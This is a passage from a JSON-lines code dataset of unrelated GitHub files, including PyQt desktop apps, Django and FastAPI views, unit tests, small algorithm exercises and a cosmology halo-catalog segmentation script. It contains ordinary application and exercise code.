QtWidgets.QHBoxLayout(self.frm_options)\n\n def add_widgets_to_layouts(self):\n self.main_layout.addWidget(self.lw_tasks)\n self.main_layout.addWidget(self.frm_options)\n self.frm_options_layout.addWidget(self.btn_add)\n self.frm_options_layout.addStretch()\n self.frm_options_layout.addWidget(self.btn_clean)\n self.frm_options_layout.addWidget(self.btn_quit)\n\n def setup_connections(self):\n self.btn_add.clicked.connect(self.add_task)\n self.btn_clean.clicked.connect(self.clean_tasks)\n self.btn_quit.clicked.connect(self.close)\n self.lw_tasks.itemClicked.connect(lambda task_item: task_item.toggle_state())\n\n def add_task(self):\n text, ok = QtWidgets.QInputDialog.getText(self, \"Ajouter une tâche\", \"Contenu de la tâche :\")\n if ok:\n package.api.task.add_task(content=text)\n self.populate_tasks()\n\n self.center_under_tray()\n self.do_animation()\n\n def center_under_tray(self):\n tray_x, tray_y, _, _ = self.tray.geometry().getCoords()\n if platform.system() == \"Windows\":\n self.move(tray_x - (self.width / 2), min(tray_y - 200, tray_y - self.get_height()))\n else:\n self.move(tray_x - (self.width / 2), tray_y + 25)\n\n def clean_tasks(self):\n for i in range(self.lw_tasks.count()):\n lw_item = self.lw_tasks.item(i)\n if lw_item.done:\n package.api.task.remove_task(lw_item.text)\n\n self.populate_tasks()\n self.center_under_tray()\n self.do_animation()\n\n def do_animation(self):\n self.anim = QtCore.QPropertyAnimation(self, b\"size\")\n self.anim.setDuration(250)\n self.anim.setEasingCurve(QtCore.QEasingCurve.InOutBack)\n self.anim.setStartValue(QtCore.QSize(self.width, self.height))\n self.anim.setEndValue(QtCore.QSize(self.width, self.get_height()))\n self.anim.start()\n\n def get_height(self):\n self.height = (self.lw_tasks.count() + 2) * 50\n return self.height\n\n def populate_tasks(self):\n self.lw_tasks.clear()\n tasks = package.api.task.get_tasks()\n for task, done in tasks.items():\n TaskItem(text=task, done=done, list_widget=self.lw_tasks)\n\n def tray_icon_click(self):\n self.center_under_tray()\n self.do_animation()\n\n if self.isHidden():\n self.showNormal()\n self.activateWindow()\n else:\n self.hide()\n","repo_name":"ThibH/application-bureau","sub_path":"PyTasks/src/main/python/package/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":5323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12890353408","text":"\"\"\"Challenge Question 04!\"\"\"\n\n__author__ = \"730573287\"\n\ndef zip(strs: list[str], ints: list[int]) -> dict[str, int]:\n \"\"\"Takes two lists and creates a dictionary with keys being items of the first list and values being items of the second list.\"\"\"\n if len(strs) != len(ints):\n return {}\n \n new_dict: dict[str, int] = {}\n index = 0\n for item in strs:\n new_dict[item] = ints[index]\n index += 1\n \n return new_dict","repo_name":"prm9924/comp110-23s-workspace","sub_path":"lessons/zip.py","file_name":"zip.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"26976823598","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound\n#from django.core import serializers\nfrom django.http import JsonResponse\n#from django.contrib import messages\n\nfrom datetime import date\n\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Officer, ExamType, Examination, Checklist, LicenseType\nfrom .forms import ExaminationForm\n\n# Create your views here.\n\n\n@login_required\ndef index(request):\n if request.method == 'POST':\n form = ExaminationForm(request.POST)\n \n if form.is_valid():\n examination_date = form.cleaned_data['examination_date']\n examination_type = form.cleaned_data['examination_type']\n examination_license_type = form.cleaned_data['examination_license_type']\n checklists = Checklist.objects.filter(examination__examination_date=str(examination_date), examination__examination_type=examination_type, examination__examination_license_type=examination_license_type)\n \n if len(checklists) == 0:\n errors = \"No checklists available for the selection\"\n return HttpResponseNotFound(errors)\n # return JsonResponse({'success':False, 'errors': errors})\n else:\n #messages.success(request, \"File found\")\n checklist_files = []\n for checklist in checklists:\n checklist_files.append('/media/'+str(checklist.checklist_file))\n\n return HttpResponse(checklist_files)\n else:\n return JsonResponse({'success': False, 'errors': form.errors})\n\n else: \n collect_new_files()\n form = ExaminationForm()\n return render(request, 'checklist/index.html', {\"form\":form }) \n\ndef collect_new_files():\n import os\n directory_path = \"media/checklist/\"\n for filename in os.listdir(directory_path):\n filepath = os.path.join('checklist/', filename)\n exam_type, license_type = filename[11:12], filename[12:13]\n try:\n examination_type = ExamType.objects.get(exam_type=exam_type)\n license_type = LicenseType.objects.get(license_name=license_type)\n examination_officer = Officer.objects.get(pk=1)\n except:\n pass\n import pdb; pdb.set_trace()\n checklist = Checklist.objects.create(checklist_name=filename, checklist_file=filepath)\n checklist.save()\n examination = Examination.objects.create(examination_date=filename[0:10],passed_candidate=0, failed_candidate=0, absent_candidate=0, traffic_officers = \"Non\", examination_type=examination_type, examination_license_type=license_type, examination_officer=examination_officer, examination_checklist=checklist)\n examination.save()\n\n\n'''\nclass Examination(models.Model):\n examination_date = models.DateField(default=date.today)\n passed_candidate = models.IntegerField(default=0)\n failed_candidate = models.IntegerField(default=0)\n absent_candidate = models.IntegerField(default=0)\n traffic_officers = models.CharField(max_length=200)\n\n examination_type = models.ForeignKey(ExamType, on_delete=models.CASCADE)\n examination_license_type = models.ForeignKey(LicenseType, on_delete=models.CASCADE, blank=True)\n examination_officer = models.ForeignKey(Officer, on_delete=models.CASCADE)\n examination_checklist = models.ForeignKey(Checklist, on_delete=models.CASCADE)\n\n def candidates(self):\n return(self.passed_candidate+self.failed_candidate+self.absent_candidate)\n\n def __str__(self):\n return(str(self.examination_date))\n'''\n","repo_name":"sandeeparyal/license_results","sub_path":"checklist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"6185886274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom sphinx_explorer.property_widget import PropertyWidget, \\\n PropertyItem, \\\n TypeBool, \\\n PropertyModel\n\nimport os\nimport sys\nimport yaml\nimport toml\nfrom qtpy.QtGui import *\nfrom qtpy.QtCore import *\nfrom qtpy.QtWidgets import *\nfrom .di import *\n\nimport platform\n\ntry:\n app = QApplication(sys.argv)\nexcept RuntimeError:\n pass\n\n\nhere = os.path.dirname(__file__)\n\n\ndef test_link():\n settings = \"\"\"\n- a\n- b:\n link: a\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n model.a.set_value(\"test\")\n assert model.a.value == \"test\"\n assert model.b.value == \"test\"\n\n\ndef test_link_format():\n settings = \"\"\"\n- a\n- b\n- c:\n link: ({a}, {b})\n- d:\n link: \"{_default}: {c}\"\n default: def\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n model.a.set_value(\"a\")\n model.b.set_value(\"b\")\n assert model.c.value == \"(a, b)\"\n assert model.d.value == \"def: (a, b)\"\n\n\ndef test_allow_empty():\n settings = \"\"\"\n - a:\n value: \"\"\n allow_empty: no\n default: \"default\"\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n assert model.a.value == \"default\"\n model.a.set_value(\"input\")\n assert model.a.value == \"input\"\n model.a.set_value(\"\")\n assert model.a.value == \"default\"\n\n\ndef test_check_tree():\n settings = \"\"\"\n - \"#group\":\n checkable: yes\n default: yes\n -\n - a\n - b\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n\n assert model.group.a.isEnabled() is True\n\n model.setData(model.group.index(), Qt.Unchecked, Qt.CheckStateRole)\n assert model.group.a.isEnabled() is False\n\n\ndef test_dump():\n settings = \"\"\"\n - \"#* Epub Settings\"\n -\n - epub_cover\n - epub_writing_mode:\n default: horizontal\n - epub_header\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n dump = model.dump()\n assert dump == {'Epub Settings': {'epub_writing_mode': 'horizontal'}}\n\n model.get(\"Epub Settings\").epub_cover.set_value(\"cover\")\n dump = model.dump()\n assert dump == {\n \"Epub Settings\": {\n \"epub_cover\": \"cover\",\n \"epub_writing_mode\": \"horizontal\",\n }\n }\n\n model.clear()\n model.load_settings(yaml.load(settings))\n model.set_values(\n {\"Epub Settings\": {\"epub_cover\": \"cover\"}}\n )\n assert model.get(\"Epub Settings\").epub_cover.value == \"cover\"\n\n flat_dump = model.dump(flat=True)\n assert flat_dump == {\n \"epub_cover\": \"cover\",\n \"epub_writing_mode\": \"horizontal\",\n }\n\n flat_dump = model.dump(flat=True, exclude_default=True)\n assert flat_dump == {\n \"epub_cover\": \"cover\",\n }\n\n flat_dump = model.dump(flat=True, store_none=True, exclude_default=True)\n assert flat_dump == {\n \"epub_cover\": \"cover\",\n \"epub_header\": None,\n }\n\n\ndef test_type():\n settings = \"\"\"\n - a:\n value_type: TypeBool\n default: true\n \"\"\"\n model = PropertyModel()\n model.load_settings(yaml.load(settings))\n\n assert model.a.value is True\n\n\nif __name__ == \"__main__\":\n import pytest\n\n pytest.main()\n","repo_name":"pashango2/sphinx-explorer","sub_path":"tests/property_widget/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"19481394144","text":"import sys\n\nsys.stdin = open(\"input_1258.txt\", \"r\")\n\n\n# dfs 를 사용해서 0.0 부터 쭉 훝어 내려오는거야\n# 0 이 아닌 점을 발견하면 그게 해당 왼쪽 코너(left_corner 로 저장) 점이 되고\n# 여기서부터 visited 에 넣어 주고, cnt += 1\n# 여기서는 오른쪽으로만 옮겨 가면서 visited 표시 해주고\n# 다음 수가 0이면 아래 방향으로 바꿔서 타고 내려가면서 visited 처리 해준다\n# 내려가다 다음 수가 0이 아니면 해당 점을 right_point 로 저장해준다\n# 해당 범위 내의 점들을 모두 visited 처리 해준다.\n# 해당 범위의 크기를 size 리스트에 저장한다.\n# size 출력 시 행렬 크기 순서대로 출력\n# 크기가 같으면 행이 작은 순서로 출력\n\n# 이걸 계속 돌려서 cnt 올리면 행렬의 개수가 나오고\n# size 리스트를 출력\n\n# boundary checked?? => 꼭!!!!!!!!!!!\n\ndef find():\n visited = [[0] * n for _ in range(n)]\n cnt = 0\n boxes = []\n for i in range(n):\n for j in range(n):\n if data[i][j] != 0 and not visited[i][j]:\n cnt += 1\n a, b = i, j # 아래에서 변의 길이를 측정할 때 i, j 값이 필요해서 a, b 로 따로 저장\n # 아니면 garo, sero = 0, 0 이라고 하고 밑에서 garo += 1 씩 해줘도 측정가능\n while b + 1 < n and data[a][b + 1] != 0:\n b = b + 1\n while a + 1 < n and data[a + 1][b] != 0:\n a = a + 1\n c, d = a, b\n boxes.append([(c - i + 1) * (d - j + 1), (c - i + 1), (d - j + 1)])\n for p in range(i, c + 1):\n for q in range(j, d + 1):\n visited[p][q] = 1\n for i in range(len(boxes) - 1):\n minbox = i\n for j in range(i + 1, len(boxes)):\n if boxes[j][0] < boxes[minbox][0]:\n minbox = j\n if boxes[j][0] == boxes[minbox][0]:\n if boxes[j][1] < boxes[minbox][1]:\n minbox = j\n boxes[i], boxes[minbox] = boxes[minbox], boxes[i]\n\n result = [cnt]\n for i in range(len(boxes)):\n result.append(boxes[i][1])\n result.append(boxes[i][2])\n return ' '.join(map(str, result))\n\n\nT = int(input())\nfor t in range(T):\n n = int(input())\n data = [list(map(int, input().split())) for _ in range(n)]\n print(\"#{} {}\".format(t + 1, find()))","repo_name":"jhee514/Algorithms","sub_path":"01_class/1258_행렬.py","file_name":"1258_행렬.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"31420725110","text":"import os\nimport sys\nimport logging\nimport logging.handlers\nfrom config.settings import logfile_name\n\n\nclass Logger(logging.Logger):\n def __init__(self):\n logger_name = \"elena\" # 模块名称\n level = logging.INFO # 日志记录等级\n logger_file = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../logfile/%s\" % logfile_name)) # 日志文件名\n\n # 创建日志文件\n logging.Logger.__init__(self, logger_file)\n if not os.path.exists(logger_file):\n os.makedirs(os.path.dirname(logger_file))\n\n # 设定日志输出格式\n log_format = logging.Formatter(\"[%(asctime)s] [\" + logger_name\n + \"] [%(levelname)s] %(filename)s [line:%(lineno)d] %(message)s\")\n\n if not sys.stdout.isatty():\n # 判断执行输出流是否是终端,是终端直接显示日志\n try:\n console_handle = logging.StreamHandler()\n console_handle.setLevel(level)\n console_handle.setFormatter(log_format)\n self.addHandler(console_handle)\n except Exception as reason:\n self.error(\"%s\" % reason)\n\n else:\n # 设置log文件\n try:\n file_handle = logging.FileHandler(logger_file)\n file_handle.setLevel(level)\n file_handle.setFormatter(log_format)\n self.addHandler(file_handle)\n except Exception as reason:\n self.error(\"%s\" % reason)\n\n # 设置回滚日志,每个日志最大10M,最多备份1个日志\n try:\n handler = logging.handlers.RotatingFileHandler(\n filename=logger_file,\n maxBytes=10 * 1024 * 1024,\n backupCount=1,\n mode='a',\n encoding=None,\n delay=0\n )\n handler.setFormatter(log_format)\n except Exception as reason:\n self.error(\"%s\" % reason)\n else:\n self.addHandler(handler)\n\n\nlogger = Logger()\n","repo_name":"su18/Elena","sub_path":"module/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"95"} +{"seq_id":"33670183862","text":"from bson.objectid import ObjectId\n\n\nclass Vacancy(object):\n \"\"\"A class for storing Project related information\"\"\"\n\n def __init__(self, hh_id=None, vacancy_name=None, url=None, salary_min=0.0,\n salary_max=0.0, currency=None):\n # if vacancy_id is None:\n # self._id = ObjectId()\n # else:\n # self._id = vacancy_id\n self.hh_id = hh_id\n self.vacancy_name = vacancy_name\n self.url = url\n self.salary_min = salary_min\n self.salary_max = salary_max\n self.currency = currency\n\n def get_as_json(self):\n \"\"\" Method returns the JSON representation of the Project object, which can be saved to MongoDB \"\"\"\n return self.__dict__\n\n @staticmethod\n def build_from_json(json_data):\n \"\"\" Method used to build Project objects from JSON data returned from MongoDB \"\"\"\n if json_data is not None:\n try:\n return Vacancy(\n # json_data.get('_id', None),\n json_data['hh_id'],\n json_data['vacancy_name'],\n json_data['url'],\n json_data['salary_min'],\n json_data['salary_max'],\n json_data['currency'])\n except KeyError as e:\n raise Exception(\"Key not found in json_data: {}\".format(e.message))\n else:\n raise Exception(\"No data to create Project from!\")","repo_name":"svyatoslavn1000/collecting_information","sub_path":"task_lesson_3/vacancy.py","file_name":"vacancy.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"13891361631","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'basicus.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^board/$', 'board.views.board'),\n url(r'^board/(\\d+)/$', 'board.views.article'),\n url(r'^board/write/$', 'board.views.write'),\n url(r'^board/comment/(\\d+)/$', 'board.views.comment'), \n)\n","repo_name":"FiaDot/basicus","sub_path":"basicus/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10173741204","text":"# -*- coding: utf-8 -*-\n# pylint: disable=missing-docstring\nfrom __future__ import absolute_import, unicode_literals\n\n# 3rd party imports\nimport pytest\n\n# Project imports\nfrom restible import url_params\n\n\n@pytest.mark.parametrize('data', (\n ({'filter': 'value'}),\n ({'filter': 123}),\n ({'filter': 3.14159}),\n ({\n 'filter1': 'value1',\n 'filter2': 123,\n 'filter3': 3.14159\n })\n))\ndef test_extracts_values_correctly(data):\n parsed = url_params.parse({str(n): str(v) for n, v in data.items()})\n\n assert parsed == data\n","repo_name":"novopl/restible","sub_path":"src/test/restible/params/test_parse.py","file_name":"test_parse.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"69890834233","text":"'''\n콜라츠추측\n'''\n'''\n첫번째풀이- answer변수사용 ,두번째풀이 - num 직접사용\n'''\ndef solution(num):\n cnt = 0 \n if num == 1: return 0\n \n while num > 1:\n num = num/2 if num % 2 == 0 else (num*3)+1\n cnt += 1\n\n return cnt if num == 1 and cnt <= 500 else -1","repo_name":"gygy7151/pythonTest","sub_path":"programmers/콜라츠추측.py","file_name":"콜라츠추측.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72606187192","text":"import sys\nfrom turtle import right\nfrom PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QPushButton, QGridLayout\nfrom PyQt5.QtCore import Qt, QPoint, QRect\nfrom PyQt5.QtGui import QPixmap, QPainter, QBrush\n\ncolors = {0: 'darkgrey', 1: 'yellow', 2: 'darkgreen', 3: 'darkred'}\nqt_colors = [Qt.darkGray, Qt.yellow, Qt.darkGreen, Qt.darkRed]\n\n\nclass MyApp(QWidget):\n def __init__(self):\n super().__init__()\n self.window_width, self.window_height = 1200, 800\n self.setMinimumSize(self.window_width, self.window_height)\n\n self.selected = 0\n\n layout = QHBoxLayout()\n layout.addStretch(1)\n layout.setSpacing(0)\n self.setLayout(layout)\n self.pix = QPixmap(self.rect().size())\n self.pix.fill(Qt.white)\n\n # Buttons\n\n self.btn_0 = QPushButton('Wall', self)\n self.btn_1 = QPushButton('Goal', self)\n self.btn_2 = QPushButton('Dirty', self)\n self.btn_3 = QPushButton('Death', self)\n self.btn_0.setStyleSheet(f\"background-color : {colors[0]}\")\n self.btn_1.setStyleSheet(f\"background-color : {colors[1]}\")\n self.btn_2.setStyleSheet(f\"background-color : {colors[2]}\")\n self.btn_3.setStyleSheet(f\"background-color : {colors[3]}\")\n\n self.buttons = [self.btn_0, self.btn_1, self.btn_2, self.btn_3]\n\n self.btn_0.clicked.connect(lambda ch, i=0: self.genericbutton(i))\n self.btn_1.clicked.connect(lambda ch, i=1: self.genericbutton(i))\n self.btn_2.clicked.connect(lambda ch, i=2: self.genericbutton(i))\n self.btn_3.clicked.connect(lambda ch, i=3: self.genericbutton(i))\n\n self.rightside = QWidget()\n rightsidelayout = QGridLayout()\n rightsidelayout.setSpacing(10)\n rightsidelayout.addWidget(self.btn_0, 0, 0)\n rightsidelayout.addWidget(self.btn_1, 0, 1)\n rightsidelayout.addWidget(self.btn_2, 1, 0)\n rightsidelayout.addWidget(self.btn_3, 1, 1)\n self.rightside.setLayout(rightsidelayout)\n\n self.rightsidewrapper = QWidget()\n rightsidewrapperlayout = QVBoxLayout()\n rightsidelayout.setSpacing(0)\n rightsidewrapperlayout.addWidget(self.rightside)\n rightsidewrapperlayout.addStretch(1)\n self.rightsidewrapper.setLayout(rightsidewrapperlayout)\n\n layout.addWidget(self.rightsidewrapper)\n\n self.begin, self.destination = QPoint(), QPoint()\n\n def genericbutton(self, input):\n print(f'button {input} clicked i guess')\n for index, but in enumerate(self.buttons):\n but.setStyleSheet(f\"background-color : {colors[index]}\")\n\n self.buttons[input].setStyleSheet(\n \"border :5px solid;\" f\"background-color : {colors[input]}\")\n\n self.selected = input\n\n # selected = 4\n\n def paintEvent(self, event):\n painter = QPainter(self)\n painter.drawPixmap(QPoint(), self.pix)\n if not self.begin.isNull() and not self.destination.isNull():\n rect = QRect(self.begin, self.destination)\n painter.drawRect(rect.normalized())\n painter.fillRect(rect.normalized(), QBrush(\n qt_colors[self.selected]))\n # self.update()\n\n def mousePressEvent(self, event):\n if event.buttons() & Qt.LeftButton:\n print(\"Point 1\")\n self.begin = event.pos()\n self.destination = self.begin\n self.update()\n\n def mouseMoveEvent(self, event):\n if event.buttons() & Qt.LeftButton:\n print(\"Point 2\")\n self.destination = event.pos()\n self.update()\n\n def mouseReleaseEvent(self, event):\n print(\"Point 3\")\n if event.button() & Qt.LeftButton:\n rect = QRect(self.begin, self.destination)\n painter = QPainter(self.pix)\n painter.drawRect(rect.normalized())\n painter.fillRect(rect.normalized(), QBrush(\n qt_colors[self.selected]))\n self.begin, self.destination = QPoint(), QPoint()\n\n self.update()\n\n\nif __name__ == \"__main__\":\n # don't auto scale when drag app to a different monitor.\n # QApplication.setAttribute(Qt.HighDpiScaleFactorRoundingPolicy.PassThrough)\n\n app = QApplication(sys.argv)\n app.setStyleSheet(\n \"\"\"\n\t\tQWidget {\n\t\t\tfont-size: 30px;\n\t\t}\n\t\"\"\"\n )\n\n myApp = MyApp()\n myApp.show()\n\n try:\n sys.exit(app.exec_())\n except SystemExit:\n print(\"Closing Window...\")\n","repo_name":"Casteeuwen/Editor","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21623997971","text":"import pandas as pd\nimport pdfkit\npath_wkthmltopdf = r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\nconfig = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)\nsv = pd.read_csv('work.csv',index_col=0)\nsv.to_html('docs/test.html')\nPdfFilename='docs/pdfPrintOut.pdf'\npdfkit.from_file('docs/test.html', PdfFilename, configuration=config)\n\n#generating from URL\npdfkit.from_url('https://www.youtube.com/watch?v=Fo7J2dHpMjk','sample1.pdf', configuration=config)\n\n#for multiple\npdfkit.from_url(['google.com', 'geeksforgeeks.org', 'facebook.com'], 'Pavan.pdf')\npdfkit.from_file(['file1.html', 'file2.html'], 'out.pdf')","repo_name":"pavanmaganti9/v1","sub_path":"munging_pdf.py","file_name":"munging_pdf.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26701364820","text":"import sys \n\nimport redis\n\n# Contains functions that stores the mapping from document IDs to URLs (originally in a text document) in redis.\n# The flask application, however, continues to use the mapping from the text document and not redis.\n\nURL_DOCID_PATH = 'ClueWeb12_B13_DocID_To_URL.txt' # Change this path as necessary.\n\n\ndef save_hash(r, n):\n \"\"\"Inserts n rows into redis using xxx as hash keys.\"\"\"\n with open(URL_DOCID_PATH, 'r') as f:\n i = 0\n for line in f:\n if i >= n:\n break\n i += 1\n\n num, url = map(lambda x: x.strip(), line.split(',', 1))\n num = num.split('-', 1)[1] # Strip `clueweb12-` from all keys to save space.\n hash_key, record_num = num.rsplit('-', 1) \n\n r.hset(hash_key, record_num, url)\n\n\ndef save_redis(r, n):\n \"\"\"Inserts n rows into redis.\"\"\"\n with open(URL_DOCID_PATH, 'r') as f:\n i = 0\n for line in f:\n if i >= n:\n break\n i += 1 \n\n num, url = map(lambda x: x.strip(), line.split(',', 1))\n num = num.split('-', 1)[1] # Strip `clueweb12-` from all keys to save space.\n r.set(num, url)\n\ndef reset_redis(r):\n \"\"\"Deletes all keys from Redis.\"\"\"\n keys = r.keys()\n if len(keys) > 0:\n r.delete(*keys)\n\n\nif __name__ == '__main__':\n # Gets command line argument for number of rows to insert into redis. Defaults to 5000.\n if len(sys.argv) > 1:\n n = int(sys.argv[1])\n else:\n n = 5000\n\n r = redis.Redis()\n # Compares the memory used by redis with and without hashes.\n for func in [save_redis, save_hash]:\n func(r, n)\n print('dbsize:', r.dbsize())\n for k, v in r.info('Memory').items():\n if k.endswith('human'):\n print(k, v)\n reset_redis(r)\n","repo_name":"muraokamasaki/research_project_a","sub_path":"app/redis_docid_to_url.py","file_name":"redis_docid_to_url.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42458924910","text":"# Import Libraries\nfrom sklearn.metrics import accuracy_score\n# ----------------------------------------------------\n'''\nsklearn.metrics.accuracy_score(y_true, y_pred, normalize=True, sample_weight=None)\n\nnormalizebool, default=True\nIf False, return the number of correctly classified samples. Otherwise, return the fraction of correctly classified samples.\n\n'''\ny_true = ['a', 'b', 'b', 'a', 'b', 'a', 'a', 'b', 'a', 'b']\ny_pred = ['a', 'a', 'b', 'b', 'a', 'b', 'a', 'a', 'a', 'a']\n\n# Calculating Accuracy Score : ((TP + TN) / float(TP + TN + FP + FN))\nAccScore = accuracy_score(y_true, y_pred)\nprint('Accuracy Score is : ', AccScore)\n","repo_name":"ahmedatef1610/scikit-learn-library-for-machine-learning","sub_path":"1.3 Metrics Module/8-accuracy_score.py","file_name":"8-accuracy_score.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17414029537","text":"from fastapi import APIRouter,HTTPException,status, Depends\nfrom blogapp.model import BookSchema, UpdateBookSchema\nfrom fastapi.responses import JSONResponse\nfrom settings.settings import BOOK_COLLECTION_NAME,get_db, get_current_user\nimport json\nfrom bson import ObjectId\nfrom pymongo import errors\nimport pydantic\n\n\npydantic.json.ENCODERS_BY_TYPE[ObjectId]=str\nrouter = APIRouter(\n tags=[\"Book\"],\n prefix=\"/books\"\n)\n\n\n\n@router.get(\"/allbooks\")\ndef getBooks(user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n books = book_col.find()\n if books is None :\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Book with this id does not exist\"\n ) \n all_books = [book for book in books]\n return all_books \n\n@router.get(\"/{id}\")\ndef getBook(id:str,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n doc_id = ObjectId(id)\n query = {\"_id\":doc_id}\n book = book_col.find_one(query)\n if book is None :\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Book with this id does not exist\"\n ) \n \n return book\n\n@router.post(\"/\")\ndef addBook(request:BookSchema,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n request_body = request.json()\n request_body_obj = json.loads(request_body)\n # request_body_obj[\"author\"] = \n try:\n print(request_body_obj)\n result = book_col.insert_one(request_body_obj)\n print(result)\n return {\"status\":status.HTTP_201_CREATED,\"details\":result.inserted_id}\n except errors.PyMongoError as e:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"Unable to add Book\"\n ) \n \n \n\n@router.delete(\"/{id}\")\ndef delete_book(id,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n doc_id = ObjectId(id)\n query = {\"_id\":doc_id}\n try:\n result = book_col.delete_one(query)\n return {\"status\": status.HTTP_204_NO_CONTENT,\"details\":\"deleted\"}\n except errors.PyMongoError as e:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST\n ) \n \n@router.put(\"/{id}\")\ndef update_book(id,request:UpdateBookSchema,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n doc_id = ObjectId(id)\n query = {\"_id\":doc_id}\n request_body = request.json()\n request_body_obj = json.loads(request_body)\n my_dict_without_none = {k: v for k, v in request_body_obj.items() if v is not None}\n print(my_dict_without_none)\n try:\n result = book_col.update_one(query,{\"$set\":my_dict_without_none})\n return {\"status\": status.HTTP_204_NO_CONTENT,\"details\":\"updated\"}\n except errors.PyMongoError as e:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST\n ) ","repo_name":"gilish-tech/BookApi","sub_path":"routers/books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"71858597433","text":"#Creates segmented Vpeak dataset given a halo catalog from the Bolshoi-Planck simulation\n\n#Imports\nimport os\nimport numpy as np\nimport itertools\nimport pickle\nfrom tqdm import tqdm\nimport pandas as pd\nnp.random.seed(230);\n#Load data\ndata = 'merged_vpeak_150_RF.cache'\nUM_halos = pd.read_csv(data)\nprint(UM_halos[['Mpredict','obs_SM']])\n#Set hyperparameters\nNsplit = 250\nscale_box = 25\nsize_of_box = 250\nh70 = 0.7\n\n#Assign halos to boxes\npos = np.array(UM_halos[['X','Y','Z']])\ncount, _ = np.histogramdd(pos, bins=(Nsplit,Nsplit,Nsplit))\nH, _ = np.histogramdd(pos, bins=(Nsplit,Nsplit,Nsplit), weights=UM_halos['Vpeak'])\nHSM, _ = np.histogramdd(pos, bins=(Nsplit,Nsplit,Nsplit), weights=np.log10(UM_halos['Mpredict']/0.678**2))\nH = H/count\nH[np.where(count==0)] = 0\nHSM = HSM/count\nHSM[np.where(count==0)] = 0\n\n#Segment simulation\nn_split_dim = int(float(size_of_box)/scale_box)\noutdir = '/home/users/chto/course/umml/data/experiment1.5_RF/datavector_original/'\nsplit_probability=0.95\ntry:\n traindir = outdir+\"train_umML/\"\n testdir = outdir+\"test_umML/\"\n os.mkdir(traindir)\n os.mkdir(testdir)\nexcept:\n None\ndef binstellarmass(sm):\n h = 0.678\n bins = np.linspace(9,12.4,35)\n result, _ = np.histogram(sm[np.isfinite(sm)], bins)\n return (result/float(scale_box)**3)[12:26]\nsmf = np.loadtxt(\"moustakas_z0.01_z0.20.smf\")\nfor i in tqdm(range(n_split_dim)):\n for j in range(n_split_dim):\n for k in range(n_split_dim):\n name = \"bolshoiplanck_halos_vpeak_150_snap_100231_{0}_{1}_{2}_scale_box_{3}\".format(i, j, k, scale_box)\n labels = \"bolshoiplanck_halos_vpeak_150_snap_100231_{0}_{1}_{2}_scale_box_{3}_labels\".format(i, j, k, scale_box)\n 